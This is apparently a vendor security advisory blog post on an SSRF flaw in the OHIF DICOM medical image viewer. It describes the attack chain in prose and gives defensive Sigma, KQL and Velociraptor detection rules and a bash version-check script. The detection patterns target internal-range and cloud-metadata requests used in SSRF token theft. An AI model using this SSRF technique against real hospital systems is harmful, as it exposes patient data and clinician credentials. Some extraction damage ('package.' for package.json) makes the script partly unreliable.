The healthcare sector faces a critical risk with the disclosure of CVE-2026-12473, a Server-Side Request Forgery (SSRF) vulnerability affecting the widely deployed OHIF DICOM Web Viewer Framework. Rated with a CVSS v3 score of 8.2 (High), this flaw impacts versions v3.12.0 and prior. CISA has issued advisory ICSMA-26-176-02, highlighting the potential for attackers to steal authenticated clinician tokens via a crafted link, effectively compromising patient data confidentiality and system integrity within medical imaging environments.
Technical Analysis
Affected Products & Versions:
- Product: OHIF DICOM Web Viewer Framework
- Vendor: Open Health Imaging Foundation (OHIF)
- Affected Versions: <= v3.12.0
- Sectors: Healthcare and Public Health (Critical Infrastructure)
Vulnerability Mechanics:
The vulnerability resides in two specific data sources shipped in the default configuration: DICOMWebProxy and DICOMJSON. These components fetch an arbitrary URL parameter without performing sufficient validation. This oversight introduces a Server-Side Request Forgery (SSRF) condition.
The Attack Chain:
- Initial Access vector: An attacker crafts a malicious link targeting a vulnerable OHIF Viewer instance. This link contains a manipulated URL parameter pointing to an attacker-controlled destination or an internal metadata service.
- Exploitation: When an authenticated clinician interacts with the link (or if the link is triggered via another mechanism), the vulnerable OHIF server processes the request.
- Payload Execution: The
DICOMWebProxyorDICOMJSONdata sources initiate a server-side request to the attacker-supplied URL. - Impact: Because the request originates from the trusted server, the attacker can leverage this to interact with internal services or, more critically in this context, steal the clinician's authentication token if it is exposed in the request headers or response bodies (e.g., via Referer headers or specific API responses).
Detection & Response
Detecting SSRF requires correlating web application logs with outbound network traffic. Defenders should look for the web server process (typically Node.js for OHIF) making unexpected outbound connections to non-whitelisted destinations or internal IP ranges.
Sigma Rules
YAML
---
title: Potential SSRF via OHIF Node.js Process Outbound Connection
id: 8a1b2c3d-4e5f-6789-0123-456789abcdef
status: experimental
description: Detects potential SSRF exploitation in OHIF Viewers by identifying the Node.js parent process making outbound connections to private or non-standard IP ranges, indicative of internal service scanning or data exfiltration.
references:
- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-02
author: Security Arsenal
date: 2026/04/22
tags:
- attack.initial_access
- attack.t1190
- attack.execution
- attack.t1059.006
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith:
- '\node.exe'
DestinationPort:
- 80
- 443
- 8080
filter_public:
DestinationIp|cidr:
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '127.0.0.0/8'
condition: selection and filter_public
falsepositives:
- Legitimate retrieval of DICOM images from internal PACS nodes (verify against allowlist)
level: high
---
title: OHIF Web Access Anomaly - URL Parameter in Query String
id: 9b2c3d4e-5f6a-7890-1234-56789abcdef0
status: experimental
description: Detects attempts to exploit OHIF by looking for suspicious 'url' parameters containing 'http' in access logs, which may indicate an attempt to trigger the DICOMWebProxy or DICOMJSON SSRF.
references:
- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-02
author: Security Arsenal
date: 2026/04/22
tags:
- attack.initial_access
- attack.t1071.001
logsource:
category: webserver
product: apache
detection:
selection:
c-uri|contains: 'url=http'
condition: selection
falsepositives:
- Unlikely, unless application legitimately passes full URLs as query strings
level: medium
KQL (Microsoft Sentinel / Defender)
KQL — Microsoft Sentinel / Defender
// Hunt for Node.js processes (OHIF) making outbound connections to suspicious IPs
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "node.exe"
| where ActionType == "ConnectionSuccess"
| extend IsPrivate = iff(
ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or
ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or
ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or
ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or
RemoteIP == "169.254.169.254", true, false)
| where IsPrivate == true or RemoteUrl contains "metadata"
| project Timestamp, DeviceName, InitiatingProcessCommandLine, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc
Velociraptor VQL
VQL — Velociraptor
-- Hunt for Node.js processes with established network connections to private ranges
SELECT Pid, Name, Cmdline, Family, RemoteAddress, RemotePort, State
FROM netstat()
WHERE Name =~ "node"
AND State =~ "ESTABLISHED"
AND (
RemoteAddress =~ "^10\."
OR RemoteAddress =~ "^192\.168\."
OR RemoteAddress =~ "^172\.(1[6-9]|2[0-9]|3[0-1])\."
OR RemoteAddress =~ "^127\."
)
Remediation Script (Bash)
Bash / Shell
#!/bin/bash
# Remediation script to check OHIF Viewer version for CVE-2026-12473
# Requires: access to the deployment directory and package.
OHIF_DIR="/var/www/ohif-viewer" # Adjust path as needed
REQUIRED_VERSION="3.13.0" # Assumed patched version placeholder, check vendor advisory
VULNERABLE_MAX="3.12.0"
echo "Checking OHIF Viewer installation at $OHIF_DIR..."
if [ -f "$OHIF_DIR/package." ]; then
CURRENT_VERSION=$(grep '"version"' "$OHIF_DIR/package." | head -n 1 | awk -F: '{print $2}' | tr -d '" ,' | tr -d '\r')
echo "Detected Version: $CURRENT_VERSION"
# Compare versions (simple string comparison for this example)
if [ "$(printf '%s\n' "$VULNERABLE_MAX" "$CURRENT_VERSION" | sort -V | head -n1)" = "$CURRENT_VERSION" ] && [ "$CURRENT_VERSION" != "$VULNERABLE_MAX" ]; then
echo "[INFO] Version seems older than or equal to vulnerable range, or check logic manually."
fi
# Logic: if current version is less than or equal to vulnerable max
# Note: 'sort -V' handles semantic versions correctly
HIGHEST_VERSION=$(printf '%s\n' "$CURRENT_VERSION" "$VULNERABLE_MAX" | sort -V | tail -n 1)
if [ "$HIGHEST_VERSION" = "$VULNERABLE_MAX" ]; then
echo "[ALERT] Vulnerable version detected ($CURRENT_VERSION <= $VULNERABLE_MAX)."
echo "Action Required: Update OHIF Viewers immediately per CISA Advisory ICSMA-26-176-02."
exit 1
else
echo "[OK] Version $CURRENT_VERSION appears to be patched."
exit 0
fi
else
echo "[ERROR] package. not found at $OHIF_DIR. Please verify the installation path."
exit 1
fi
Remediation
- Patch Immediately: Update the OHIF DICOM Web Viewer Framework to the latest version. Versions v3.12.0 and below are vulnerable. Ensure you are on a version newer than v3.12.0 as soon as the vendor release is available.
- Network Segmentation: Implement strict egress filtering on the server hosting the OHIF Viewer. The application should only be allowed to communicate with necessary internal PACS servers and authenticated identity providers. Block access to the internet and non-essential internal subnets (e.g., metadata services like 169.254.169.254).
- Configuration Audit: Review the configuration of
DICOMWebProxyandDICOMJSONdata sources. Ensure that any URL parameters utilized are validated against a strict allowlist of permitted domains or IPs. - Review Access Logs: Audit web server access logs for evidence of exploitation, specifically looking for requests containing URL parameters that redirect to external or unexpected internal domains.
Vendor Advisory: Open Health Imaging Foundation / CISA ICSMA-26-176-02
Related Resources
Security Arsenal Healthcare Cybersecurity AlertMonitor Platform Book a SOC Assessment healthcare Intel Hub
healthcare-cybersecurityhipaa-compliancehealthcare-ransomwareehr-securitymedical-data-breachohifcve-2026-12473ssrf
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.